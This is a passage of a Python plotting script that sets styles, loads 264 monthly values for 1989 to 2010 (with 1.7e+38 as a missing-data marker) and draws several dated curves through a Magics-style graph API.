    7.8, 7.6, 7.7, 6.5, 5.7, 5.4, 4.9, 4.7, 5.9, 6.3, 8.0, 6.7,
    8.0, 7.7, 7.7, 6.1, 5.7, 4.8, 4.4, 4.8, 5.6, 6.5, 7.4, 7.7,
    8.0, 7.1, 6.8, 6.3, 5.7, 5.1, 4.3, 4.8, 5.9, 6.4, 7.4, 7.7,
    7.6, 7.5, 7.2, 6.2, 5.6, 4.7, 4.3, 4.4, 5.8, 6.7, 6.7, 8.0,
    7.9, 8.0, 6.9, 6.9, 5.7, 5.1, 4.6, 4.6, 5.9, 6.7, 7.8, 7.4,
    7.4, 6.7, 6.6, 6.0, 5.4, 4.9, 4.4, 4.2, 1.7e+38, 6.1, 6.2, 6.9,
    6.7, 7.0, 6.3, 6.0, 5.1, 4.8, 4.2, 4.5, 5.4, 6.1, 6.1, 6.7,
    6.67, 7.08, 6.99, 6.14, 5.16, 4.45, 4.5, 4.34, 5.24, 5.41, 5.89, 6.83,
    6.63, 6.15, 1.7e+38, 5.69, 5.41, 4.38, 4.29, 4.26, 5.34, 5.99, 6.05, 6.56,
    6.45, 5.97, 6.02, 5.56, 4.64, 4.4, 3.71, 4.22, 4.97, 5.68, 6.16, 6.22,
    6.12, 5.82, 5.63, 5.06, 4.61, 4.12, 3.82, 3.91, 4.71, 5.35, 5.61, 5.85,
    6.02, 5.78, 5.83, 4.79, 4.42, 3.98, 4.16, 3.54, 4.64, 5.2, 5.91, 5.93,
    5.87, 5.78, 5.48, 4.87, 4.55, 3.87, 3.4, 3.71, 1.7e+38, 4.94, 6.11, 5.56,
    5.49, 5.69, 4.74, 4.79, 4.2, 3.97, 3.63, 3.66, 4.02, 4.99, 4.6, 5.46,
    5.15, 5.09, 5.56, 4.21, 4.15, 3.68, 3.51, 3.48, 4.01, 4.78, 5.22, 5.27,
    5.22, 5.03, 5.0, 4.48, 3.94, 3.55, 3.47, 3.5, 4.02, 4.48, 5.26, 5.22]))
# Styling: brick markers, chain-dash line and missing-data bridge.
mpp.setc('graph_missing_data_colour', 'brick')
mpp.seti('graph_symbol_marker_index', 2)
mpp.setc('graph_symbol_colour', 'brick')
mpp.setc('graph_missing_data_style', 'chain_dash')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'chain_dash')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
# Render the curve with the parameters set above.
mpp.graph()
# Restore every graph parameter touched for the previous curve
# back to its default before the next one is configured.
for _param in ('graph_line_colour',
               'graph_curve_date_x_values',
               'graph_missing_data_mode',
               'graph_symbol',
               'graph_missing_data_thickness',
               'graph_curve_y_values',
               'graph_missing_data_colour',
               'graph_symbol_marker_index',
               'graph_symbol_colour',
               'graph_missing_data_style',
               'graph_symbol_height',
               'graph_type',
               'graph_line_style',
               'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, as the original recording did.
# Recorded values: position 0.0/0.0, size 29.7 x 21.0 (presumably
# A4 landscape in centimetres — per the values noted in the trace).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
# Curve: blue chain-dot line with symbol markers (marker index 3).
mpp.setc('graph_line_colour', 'blue')
# X axis: first of every month from 1989-01-01 to 2010-12-01
# (22 years x 12 months = 264 points).
mpp.set1c('graph_curve_date_x_values',
          ['%d-%02d-01' % (year, month)
           for year in range(1989, 2011)
           for month in range(1, 13)])
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
# 264 monthly y-values; 1.7e+38 appears to be the missing-value
# sentinel handled by the graph_missing_data_* settings.
mpp.set1r('graph_curve_y_values', array([
    5.6, 5.5, 5.0, 5.0, 4.3, 4.0, 3.7, 3.7, 1.7e+38, 4.6, 5.0, 5.8,
    5.6, 5.3, 5.3, 4.8, 4.6, 4.0, 3.6, 3.7, 4.2, 4.6, 5.3, 5.8,
    5.5, 5.6, 5.2, 5.1, 4.6, 3.7, 3.5, 3.5, 4.1, 5.0, 4.7, 5.9,
    5.6, 5.3, 5.4, 4.6, 4.2, 3.8, 3.4, 3.5, 4.4, 4.6, 5.3, 5.7,
    5.7, 5.7, 5.3, 4.2, 3.9, 3.4, 3.1, 3.3, 3.7, 4.4, 5.2, 5.2,
    5.4, 5.7, 5.1, 4.5, 3.8, 3.5, 3.1, 3.2, 3.7, 4.2, 4.9, 5.2,
    5.0, 4.4, 4.3, 3.9, 3.4, 3.3, 2.9, 3.0, 3.5, 3.8, 4.3, 4.1,
    4.7, 4.8, 4.4, 3.7, 3.4, 3.1, 3.0, 3.1, 3.5, 4.1, 4.1, 4.4,
    4.6, 4.3, 4.1, 3.6, 3.4, 3.4, 2.9, 3.1, 3.5, 3.7, 4.2, 4.2,
    4.3, 4.1, 4.0, 3.5, 3.3, 3.0, 2.6, 2.8, 3.4, 3.7, 3.9, 4.3,
    4.2, 4.4, 4.2, 3.5, 3.0, 2.86, 2.77, 2.65, 3.21, 3.47, 3.62, 3.8,
    4.17, 4.05, 3.72, 3.27, 2.88, 2.58, 2.52, 2.51, 2.91, 3.2, 3.45, 3.72,
    3.89, 3.76, 3.42, 3.13, 2.75, 2.39, 2.45, 2.53, 2.87, 2.93, 3.39, 3.51,
    3.49, 3.37, 3.35, 3.12, 2.68, 2.38, 2.55, 2.38, 2.76, 2.96, 3.1, 3.34,
    3.34, 3.15, 3.21, 2.77, 2.59, 2.3, 2.34, 2.36, 2.67, 3.2, 3.13, 3.47,
    3.23, 3.26, 3.25, 2.81, 2.53, 2.39, 2.24, 2.43, 2.61, 2.8, 2.92, 3.26,
    3.15, 2.99, 2.97, 2.75, 2.39, 2.16, 2.06, 2.17, 2.55, 2.63, 2.93, 2.99,
    3.14, 2.98, 2.78, 2.38, 2.24, 2.19, 2.29, 2.22, 2.46, 1.7e+38, 2.72, 2.98,
    2.8, 2.72, 2.72, 2.48, 2.16, 1.97, 1.9, 1.96, 2.14, 2.46, 2.77, 2.71,
    2.88, 2.87, 2.55, 2.25, 2.16, 2.01, 1.88, 1.82, 1.99, 2.57, 2.51, 2.86,
    2.68, 2.58, 2.65, 2.19, 2.08, 1.88, 1.84, 1.86, 2.17, 2.43, 2.35, 2.71,
    2.54, 2.47, 2.33, 2.22, 1.95, 1.87, 1.8, 1.84, 1.98, 2.13, 2.26, 2.49]))
# Styling: blue markers, chain-dot line and missing-data bridge.
mpp.setc('graph_missing_data_colour', 'blue')
mpp.seti('graph_symbol_marker_index', 3)
mpp.setc('graph_symbol_colour', 'blue')
mpp.setc('graph_missing_data_style', 'chain_dot')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'chain_dot')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
# Render the curve with the parameters set above.
mpp.graph()
# Restore every graph parameter touched for the previous curve
# back to its default before the next one is configured.
for _param in ('graph_line_colour',
               'graph_curve_date_x_values',
               'graph_missing_data_mode',
               'graph_symbol',
               'graph_missing_data_thickness',
               'graph_curve_y_values',
               'graph_missing_data_colour',
               'graph_symbol_marker_index',
               'graph_symbol_colour',
               'graph_missing_data_style',
               'graph_symbol_height',
               'graph_type',
               'graph_line_style',
               'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, as the original recording did.
# Recorded values: position 0.0/0.0, size 29.7 x 21.0 (presumably
# A4 landscape in centimetres — per the values noted in the trace).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
mpp.setc('graph_line_colour','blue')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
# Missing-data handling for the curve just loaded: 'ignore' skips sentinel
# points (the 1.70e+38 values in the y array appear to be the Magics
# missing-value sentinel — confirm against the generator), and symbol
# plotting is enabled for the remaining points.
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 8.00000000e+00, 7.90000000e+00, 7.10000000e+00,
7.00000000e+00, 6.00000000e+00, 5.50000000e+00,
5.00000000e+00, 5.10000000e+00, 1.70000000e+38,
6.70000000e+00, 7.50000000e+00, 8.80000000e+00,
7.90000000e+00, 7.60000000e+00, 8.10000000e+00,
7.40000000e+00, 6.40000000e+00, 5.50000000e+00,
4.90000000e+00, 5.20000000e+00, 5.80000000e+00,
7.00000000e+00, 8.30000000e+00, 8.70000000e+00,
8.10000000e+00, 8.10000000e+00, 7.40000000e+00,
7.60000000e+00, 6.40000000e+00, 5.40000000e+00,
5.10000000e+00, 5.30000000e+00, 6.20000000e+00,
7.70000000e+00, 7.50000000e+00, 9.10000000e+00,
8.40000000e+00, 8.10000000e+00, 7.90000000e+00,
7.10000000e+00, 6.10000000e+00, 5.60000000e+00,
4.70000000e+00, 5.00000000e+00, 6.50000000e+00,
6.90000000e+00, 7.70000000e+00, 8.50000000e+00,
8.50000000e+00, 8.70000000e+00, 8.20000000e+00,
6.60000000e+00, 5.70000000e+00, 5.10000000e+00,
4.80000000e+00, 5.00000000e+00, 5.60000000e+00,
6.50000000e+00, 7.80000000e+00, 7.70000000e+00,
8.30000000e+00, 8.70000000e+00, 7.80000000e+00,
7.20000000e+00, 5.90000000e+00, 5.30000000e+00,
4.60000000e+00, 4.80000000e+00, 5.80000000e+00,
6.60000000e+00, 7.50000000e+00, 7.90000000e+00,
7.90000000e+00, 7.00000000e+00, 6.90000000e+00,
6.30000000e+00, 5.20000000e+00, 5.00000000e+00,
4.40000000e+00, 4.50000000e+00, 5.30000000e+00,
6.20000000e+00, 7.20000000e+00, 6.50000000e+00,
7.40000000e+00, 7.50000000e+00, 7.50000000e+00,
5.90000000e+00, 5.50000000e+00, 4.60000000e+00,
4.40000000e+00, 4.70000000e+00, 5.30000000e+00,
6.80000000e+00, 7.20000000e+00, 6.90000000e+00,
7.80000000e+00, 6.80000000e+00, 6.80000000e+00,
6.00000000e+00, 5.30000000e+00, 5.10000000e+00,
4.40000000e+00, 4.80000000e+00, 5.40000000e+00,
6.40000000e+00, 6.70000000e+00, 6.80000000e+00,
7.00000000e+00, 6.80000000e+00, 6.70000000e+00,
6.00000000e+00, 5.20000000e+00, 4.60000000e+00,
4.20000000e+00, 4.50000000e+00, 6.00000000e+00,
6.10000000e+00, 6.80000000e+00, 7.00000000e+00,
7.20000000e+00, 7.10000000e+00, 6.50000000e+00,
5.80000000e+00, 5.30000000e+00, 4.75000000e+00,
4.38000000e+00, 4.36000000e+00, 5.52000000e+00,
6.10000000e+00, 6.64000000e+00, 6.23000000e+00,
6.83000000e+00, 6.73000000e+00, 6.24000000e+00,
5.71000000e+00, 5.10000000e+00, 4.39000000e+00,
3.95000000e+00, 4.15000000e+00, 4.88000000e+00,
5.51000000e+00, 5.77000000e+00, 6.58000000e+00,
6.74000000e+00, 6.63000000e+00, 5.97000000e+00,
5.57000000e+00, 4.96000000e+00, 4.09000000e+00,
4.09000000e+00, 4.10000000e+00, 5.02000000e+00,
5.10000000e+00, 6.07000000e+00, 6.02000000e+00,
5.93000000e+00, 5.82000000e+00, 5.86000000e+00,
5.64000000e+00, 4.61000000e+00, 4.13000000e+00,
4.31000000e+00, 4.11000000e+00, 5.16000000e+00,
5.10000000e+00, 5.40000000e+00, 6.02000000e+00,
5.74000000e+00, 5.60000000e+00, 5.85000000e+00,
4.96000000e+00, 4.45000000e+00, 3.94000000e+00,
3.84000000e+00, 3.92000000e+00, 4.83000000e+00,
5.45000000e+00, 5.67000000e+00, 6.24000000e+00,
5.65000000e+00, 5.54000000e+00, 5.53000000e+00,
5.04000000e+00, 4.49000000e+00, 4.08000000e+00,
3.53000000e+00, 4.01000000e+00, 4.72000000e+00,
5.37000000e+00, 5.61000000e+00, 5.80000000e+00,
6.00000000e+00, 5.50000000e+00, 5.29000000e+00,
4.91000000e+00, 4.28000000e+00, 3.87000000e+00,
3.59000000e+00, 3.88000000e+00, 4.47000000e+00,
5.04000000e+00, 5.40000000e+00, 5.57000000e+00,
5.73000000e+00, 5.51000000e+00, 5.49000000e+00,
4.37000000e+00, 4.26000000e+00, 3.86000000e+00,
3.94000000e+00, 3.59000000e+00, 4.49000000e+00,
1.70000000e+38, 5.33000000e+00, 5.54000000e+00,
5.02000000e+00, 5.21000000e+00, 4.85000000e+00,
4.81000000e+00, 4.12000000e+00, 3.63000000e+00,
3.14000000e+00, 3.51000000e+00, 3.96000000e+00,
4.68000000e+00, 5.38000000e+00, 5.02000000e+00,
5.22000000e+00, 5.18000000e+00, 4.75000000e+00,
4.47000000e+00, 3.86000000e+00, 3.55000000e+00,
3.35000000e+00, 3.24000000e+00, 3.89000000e+00,
5.03000000e+00, 4.72000000e+00, 5.30000000e+00,
5.04000000e+00, 4.77000000e+00, 5.09000000e+00,
4.22000000e+00, 3.96000000e+00, 3.45000000e+00,
3.29000000e+00, 3.26000000e+00, 4.18000000e+00,
4.73000000e+00, 4.76000000e+00, 5.29000000e+00,
4.66000000e+00, 4.40000000e+00, 4.39000000e+00,
4.20000000e+00, 3.52000000e+00, 3.31000000e+00,
3.20000000e+00, 3.34000000e+00, 3.63000000e+00,
4.14000000e+00, 4.70000000e+00, 4.83000000e+00])) #264
# Styling for the first curve: solid blue line, marker index 4, with
# missing-data segments drawn in the same colour/style.
mpp.setc('graph_missing_data_colour','blue')
mpp.seti('graph_symbol_marker_index',4)
mpp.setc('graph_symbol_colour','blue')
mpp.setc('graph_missing_data_style','solid')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','solid')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
# Draw the curve using all graph_* parameters set above.
mpp.graph()
# Restore every graph_* parameter touched for this curve to its default,
# so the next curve starts from a clean state.
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
# Query current page geometry; the trailing comments record the values the
# generator observed (presumably cm, A4 landscape — confirm).
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
# Same missing-data handling as the previous curve: ignore the 1.70e+38
# sentinel points and plot symbols at the valid ones.
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 5.20000000e+00, 5.50000000e+00, 4.70000000e+00,
4.60000000e+00, 3.90000000e+00, 3.70000000e+00,
3.40000000e+00, 3.60000000e+00, 4.00000000e+00,
4.30000000e+00, 4.80000000e+00, 4.90000000e+00,
5.10000000e+00, 4.50000000e+00, 4.70000000e+00,
4.40000000e+00, 3.90000000e+00, 3.50000000e+00,
3.30000000e+00, 3.50000000e+00, 3.90000000e+00,
4.50000000e+00, 4.50000000e+00, 5.00000000e+00,
5.10000000e+00, 5.00000000e+00, 4.50000000e+00,
4.40000000e+00, 4.00000000e+00, 3.70000000e+00,
3.30000000e+00, 3.30000000e+00, 3.80000000e+00,
4.30000000e+00, 4.20000000e+00, 5.00000000e+00,
4.70000000e+00, 4.80000000e+00, 4.40000000e+00,
4.20000000e+00, 3.70000000e+00, 3.40000000e+00,
3.30000000e+00, 3.50000000e+00, 4.00000000e+00,
4.00000000e+00, 4.70000000e+00, 4.90000000e+00,
4.80000000e+00, 4.90000000e+00, 4.80000000e+00,
4.00000000e+00, 3.70000000e+00, 3.20000000e+00,
3.10000000e+00, 3.30000000e+00, 3.60000000e+00,
4.20000000e+00, 4.50000000e+00, 4.70000000e+00,
4.50000000e+00, 4.80000000e+00, 4.40000000e+00,
4.00000000e+00, 3.60000000e+00, 3.20000000e+00,
3.30000000e+00, 3.10000000e+00, 3.60000000e+00,
4.10000000e+00, 4.70000000e+00, 4.80000000e+00,
4.70000000e+00, 4.70000000e+00, 4.80000000e+00,
3.90000000e+00, 3.60000000e+00, 3.40000000e+00,
2.90000000e+00, 3.10000000e+00, 3.70000000e+00,
4.10000000e+00, 4.50000000e+00, 4.10000000e+00,
4.60000000e+00, 4.50000000e+00, 4.20000000e+00,
3.60000000e+00, 3.30000000e+00, 2.80000000e+00,
2.80000000e+00, 2.90000000e+00, 3.50000000e+00,
3.90000000e+00, 4.60000000e+00, 4.70000000e+00,
4.70000000e+00, 4.30000000e+00, 4.50000000e+00,
4.20000000e+00, 3.50000000e+00, 3.40000000e+00,
2.80000000e+00, 3.20000000e+00, 3.50000000e+00,
4.10000000e+00, 4.40000000e+00, 4.50000000e+00,
4.40000000e+00, 4.30000000e+00, 4.10000000e+00,
3.80000000e+00, 3.40000000e+00, 3.20000000e+00,
3.00000000e+00, 3.30000000e+00, 3.90000000e+00,
3.90000000e+00, 3.70000000e+00, 4.40000000e+00,
4.40000000e+00, 4.20000000e+00, 3.80000000e+00,
3.50000000e+00, 3.10000000e+00, 3.00000000e+00,
2.90000000e+00, 2.90000000e+00, 3.20000000e+00,
3.60000000e+00, 4.00000000e+00, 4.20000000e+00,
4.30000000e+00, 4.00000000e+00, 3.70000000e+00,
3.40000000e+00, 3.00000000e+00, 3.00000000e+00,
2.70000000e+00, 2.70000000e+00, 1.70000000e+38,
3.40000000e+00, 3.70000000e+00, 4.10000000e+00,
3.90000000e+00, 4.00000000e+00, 3.70000000e+00,
3.60000000e+00, 3.00000000e+00, 2.50000000e+00,
2.30000000e+00, 2.40000000e+00, 2.80000000e+00,
3.20000000e+00, 3.70000000e+00, 3.80000000e+00,
3.80000000e+00, 3.80000000e+00, 3.70000000e+00,
3.20000000e+00, 2.80000000e+00, 1.70000000e+38,
2.40000000e+00, 2.40000000e+00, 2.80000000e+00,
3.20000000e+00, 3.40000000e+00, 3.70000000e+00,
3.70000000e+00, 3.70000000e+00, 3.60000000e+00,
3.10000000e+00, 2.80000000e+00, 2.40000000e+00,
2.20000000e+00, 2.30000000e+00, 2.80000000e+00,
3.20000000e+00, 3.30000000e+00, 3.70000000e+00,
3.90000000e+00, 3.80000000e+00, 3.60000000e+00,
3.10000000e+00, 2.50000000e+00, 2.30000000e+00,
2.10000000e+00, 2.30000000e+00, 2.80000000e+00,
3.00000000e+00, 3.40000000e+00, 3.80000000e+00,
3.60000000e+00, 3.80000000e+00, 3.30000000e+00,
2.90000000e+00, 2.60000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.30000000e+00,
2.50000000e+00, 2.90000000e+00, 3.00000000e+00,
3.10000000e+00, 3.10000000e+00, 3.00000000e+00,
2.50000000e+00, 2.40000000e+00, 2.20000000e+00,
2.10000000e+00, 2.00000000e+00, 2.40000000e+00,
2.60000000e+00, 2.90000000e+00, 3.20000000e+00,
3.10000000e+00, 3.10000000e+00, 3.00000000e+00,
2.70000000e+00, 2.40000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.20000000e+00,
2.60000000e+00, 2.80000000e+00, 3.00000000e+00,
3.20000000e+00, 3.00000000e+00, 2.70000000e+00,
2.50000000e+00, 2.30000000e+00, 2.20000000e+00,
2.10000000e+00, 2.10000000e+00, 2.20000000e+00,
2.70000000e+00, 2.70000000e+00, 3.10000000e+00,
3.10000000e+00, 2.80000000e+00, 3.00000000e+00,
2.50000000e+00, 2.30000000e+00, 2.00000000e+00,
2.10000000e+00, 2.10000000e+00, 2.30000000e+00,
2.60000000e+00, 2.80000000e+00, 2.90000000e+00,
2.90000000e+00, 2.80000000e+00, 2.80000000e+00,
2.60000000e+00, 2.20000000e+00, 2.10000000e+00,
2.00000000e+00, 2.00000000e+00, 2.10000000e+00,
2.40000000e+00, 2.70000000e+00, 2.90000000e+00])) #264
# Styling for the second curve: dotted evergreen line, marker index 5.
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',5)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','dot')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dot')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
# Draw the curve using all graph_* parameters set above.
mpp.graph()
# Reset all curve parameters back to defaults before the next curve.
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
